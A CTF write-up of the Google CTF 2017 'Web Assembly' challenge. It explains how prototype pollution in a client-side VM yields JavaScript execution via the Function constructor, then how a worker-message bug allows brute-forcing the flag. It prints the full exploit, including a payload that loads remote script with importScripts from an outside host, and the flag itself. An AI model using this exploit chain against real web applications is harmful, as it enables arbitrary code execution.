This is a writeup on Web Assembly challenge from Google CTF Quals 2017, which took place on 6/16/17-6/18/17.
This challenge was categorized as a Web challenge.
Some parts of this writeup will include background information about the concept.
This challenge takes place on a very retro looking page the lets you drag assembly instructions from the sidebar into the main page. One button lets us compile the code, and another lets us run it. There are also a list of test cases. A quick glance at the source shows that they have implemented a simple assembly architecture and vm on the client side.
We are given several unminimized javascript files. I will quickly list what each is responsible for:
asm.js
- This file parses the input, and converts it into a "bytecode", which encodes the instructions as raw bytes.vm.js
- This file contains the VM implementation that decodes the bytecode and runs the instructions.test.js
- This file contains code to run a webworker with the VM. It also gives it the testcase input, and compares the worker's output to the expected output.worker.js
- This is run by the webworker. It takes the input, runs the VM, and then responds with the output.
One of the testcases checks our code's output against the flag. If it matches, it will print the flag out to us. Since we cannot know the flag to output it, we can assume that we need to find a bug in the VM and gain javscript execution.
The first step is in asm.js
, where our data is parsed and compiled to a byte code. This process is fairly straight forward.
There are three datatypes:
int
is simply a 32 bit integer valuefloat
is simply a 64 bit float valuestring
is a set of bytes, which is prefixed by the length as an integer. Strings are decoded back to normal javascript strings later one.
If a label is used, it looks up the location as an integer. However, it also sets the high bit of the byte that reperesents
what data type it is. This is important for later, so I modified the code to let me set the bit by prepending the type with a *
.
The actual instructions are also encoded as a byte.
Finally the 'data section' is encoded similarly to the data types, and stored at the beginning of the output byte array.
The virtual machine first decodes all of the instructions. Each one is replaced by a function calls the action with the given arguments. Each argument is decoded, and passed to this function. If the high bit is set (marking it as a pointer), the argument is replaced by a function that offset of memory:
if (pointer) {
value = function(memory) {
return memory[view[0]];
};
}
Here is the code of two important opcodes:
mov
- Moves the second value into some offset of memoryvalue = function(memory) { memory[getValue(to.value, memory)] = getValue(aux.value, memory); return keepGoing; };
get
- Call the function associated with a file descriptor, and store the value in memoryvalue = function(memory) { memory[getValue(to.value, memory)] = fds[getValue(aux.value, memory)](); return keepGoing; };
Get value will recursively call its input until an error is thrown. This is used to either return the non-function for the normal values, or call the function for the pointer values:
function getValue(value, memory) {
try {
return getValue(value(memory), memory);
} catch (e) {
return value;
}
}
The other opcodes are fairly straight forward, but also we will only need these two for the final exploit.
All these functions are put into an array called memory
, with the data section starting at index 1.
The bug in this implementation is pretty simple. When we access some value in memory, we are not limited to numbers, since we can use force
a string to be a pointer by setting the high bit. When we do this we gain access to all the attributes of the javascript array such as __proto__
.
Doing something like mov int 0 *string __proto__
results with memory[0] = memory['__proto__']
.
In Javascript pretty much every type is an Object. Objects have attributes that define what they do, many of which are backed by the native interpreter, depending on the object's type. These attributes can be accessed with either the .
operator, or ['key']
notation.
Objects also have __proto__
attribute (which is also an object), that defines all attributes for the class of the object. When you access an attribute that is not a direct property of the instance of the object, Javscript will try to access it on the object's __proto__
. Of course if it isn't a direct attribute of the __proto__
, it will check the __proto__
's __proto__
(remember, __proto__
is just an object too!). This is how Javascript does inheritance. If the attribute is not found anywhere, and a null
__proto__
is reached, then it returns it as undefined.
Note that the same __proto__
is shared for a given class, so if you modify it, objects of the same type will also be affected by the changes.
In javascript there are many ways to try and escape sandboxes. Our eventual goal will be to call eval('our data')
or
Function('our data')()
.
If our goal is to run Function('our data')()
, we need to be able to arbitrarily call Function
, however we don't actually have a
reference to it anywhere. Luckily, you can also use constructor
, as long as you got the constructor reference from a function.
Unfortunately for our current situation, memory
is an array, not a function, so memory['constructor']
will only ever create an array.
To bypass this, we can change the __proto__
of memory. As I said above, javascript will recursively search __proto__
until it finds the
attribute you are looking for. If we are asking for constructor
, it will search memory.__proto__
for constructor
, and if not found look for it in
memory.__proto__.__proto__
.
So what if we replace memory.__proto__
with a some function? Well constructor
will be found in memory.__proto__.__proto__
which
will happen to be the function's original __proto__
!
If so many __proto__
s confuse you, the TL;DR is that we can turn memory into a function object temporally, allowing us to access a function
constructor.
All we need to do is mov string __proto__ *string someArrayFunction
which hopefully become memory['__proto__'] = memory['someArrayFunction']
.
The only problem now, is getValue
:
function getValue(value, memory) {
try {
return getValue(value(memory), memory);
} catch (e) {
return value;
}
}
As you can see it will continue to call what ever we try to access. If we want to store a function, we need getValue to return a function. The only
way to do that is to cause an exception. Looking at the array's functions, I found __defineGetter__
, which takes two arguments. If only one is given,
such as in getValue
, it throws an exception. Perfect!
So far our exploit is:
.data
.code
&main:
mov string __proto__ *string __defineGetter__
First we want to grab the constructor from the now-function memory object with mov int 0 *string constructor
, which will do
memory[0] = memory['constructor']
.
The next challenge is to actually call it with our payload. It is easy to call, all we need to do is mov int 0 *int 0
but this will end up doing memory['constructor'](memory)
thanks to getValue
.
Unfortunately this throws an exception as it tries to do memory.toString
, but toString
is function's toString
',
and not expecting and array.
We can fix this by restoring memory's __proto__
with an array, much like how we did
made it a function before.
However, where do we get an array? We can't even call memory's constructor to make one, since it is a function now... Luckily there was the get opcode:
value = function(memory) {
memory[getValue(to.value, memory)] = fds[getValue(aux.value, memory)]();
return keepGoing;
};
fds
is an array with a normal __proto__
, so we can do get string __proto__ string constructor
which will run memory['__proto__'] = fds['__constructor']()
. This makes memory and array again.
memory.toString()
works again, but what does it actually produce? For an array, it functions like
memory.join(',')
. This will give us our data separated by commas.
For this to be valid javascript, we can sick our payload at the start, and comment out the rest:
PAYLOAD/*,1,2,3,4,5,6,7,8,...,*/
To do this, we can simply stick our payload in the data section, and move it to index 0, while moving
a */
to a very far off index.
Here is our payload now.
.data
$a string PAYLOAD/*
$b */
.code
&main:
mov int 500 *int 2 ; move the '/*' to a far away index
mov int 0 *int 1 ; move the payload to index 0
mov string __proto__ *string __defineGetter__ ; Make memory a function __proto__
mov int 2 * string constructor ; Store the function constructor
get string __proto__ string constructor ; Restore memory's __proto__ to an array
mov int 2 *int 2 ; Call the function constructor with our payload (as memory.toString())
All this to do Function('PAYLOAD/*,,,,,,*/')()
!
Now that we have arbitrary javascript running, we need to figure out how to get the flag. The code is running in a webworker, which is somewhat sandboxed. It cannot access the dom, or the location of the old page, which is where the flag is located.
So now we can look at how the parent is reading the response from the worker. We can send any responses we want now, so there may be a bug there too.
test.js
sets the worker, with a callback for onmessage.
return new Promise(function(resolve, reject) {
worker.onerror = function(e) {
reject(e);
};
worker.onmessage = function(e) {
if (e.data['answer'] == test[1]) {
resolve(e.data);
} else {
reject(new TestCaseError(e.data));
}
worker.terminate();
};
});
We can see that if the answer attribute of the returned data object is not equal to the expected output,
it will reject, and terminate our worker. However, if we are able to cause an exception before
worker.terminate();
, we will be able to continue sending guesses.
Looking at TestCaseError
we can see that data.test
is appended to a string, meaning toString
will
be called:
function TestCaseError(data) {
Error.call(this, this.message = 'Wrong answer on test ' + data.test);
}
It is easy to cause an exception here, by making test.toString
not a function:
postMessage({
answer: 'Our Guess',
test: {toString:'asdf'},
counters: {cycles: 0}
})
Now we can guess as many times as we want. As long as we get it right once this code will be called:
.then(function(results) {
showUser('Your code is correct!');
var cycles = results.reduce(function(acc, result) {
return acc + result['counters']['cycles'];
}, 0);
console.log(cycles, asm.byteLength);
if (cycles < 20 * tests.length) {
if (asm.byteLength < 400) {
showUser(
'Your answers:' +
results
.map(function(result) {
return result['answer'];
})
.join());
return true;
} else {
showUser('Well done! Now make the code smaller.');
}
} else {
showUser('Well done! Now make the code faster.');
}
})
We can do this easily:
for(var i=0; i<128; i++) {
var c = String.fromCharCode(i);
postMessage({
answer: c,
test: { toString:'asdf' },
counters: { cycles: 0 }
})
}
At this point we would have to make this code both small enough to make <400 bytes encoded, and also make it play nicly with the parser. I decided not to do this, and instead use a nice feature of the webworker.
self.importScripts('http://itszn.com/g2/pl.js')
importScripts
will synchronously load and run a javascript file, which is nice, because we can make our
payload as long as we want now.
Here is the final payload (remember the *
syntax is something I modified myself to set the pointer bit):
.data
$a string self.importScripts('http://itszn.com/g2/pl.js')/*
$b */
.code
&main:
mov int 500 *int 2 ; move the '/*' to a far away index
mov int 0 *int 1 ; move the payload to index 0
mov string __proto__ *string __defineGetter__ ; Make memory a function __proto__
mov int 2 * string constructor ; Store the function constructor
get string __proto__ string constructor ; Restore memory's __proto__ to an array
mov int 2 *int 2 ; Call the function constructor with our payload (as memory.toString())
pl.js:
for(var i=0; i<128; i++) {
var c = String.fromCharCode(i);
postMessage({
answer: c,
test: { toString:'asdf' },
counters: { cycles: 0 }
})
}
Running this with the 'Guess The Flag' test causes all the test cases to pass, and have it print the flag.
Now we just need to submit it so it will run on the remote server.
It took a few tries, because I kept getting 500 errors. (Although I knew it was working because I was getting requests for the payload file). Finally it went though:
The final flag is CTF{_r3m0v3_th3_c0mm4s_plz_kthxbye_}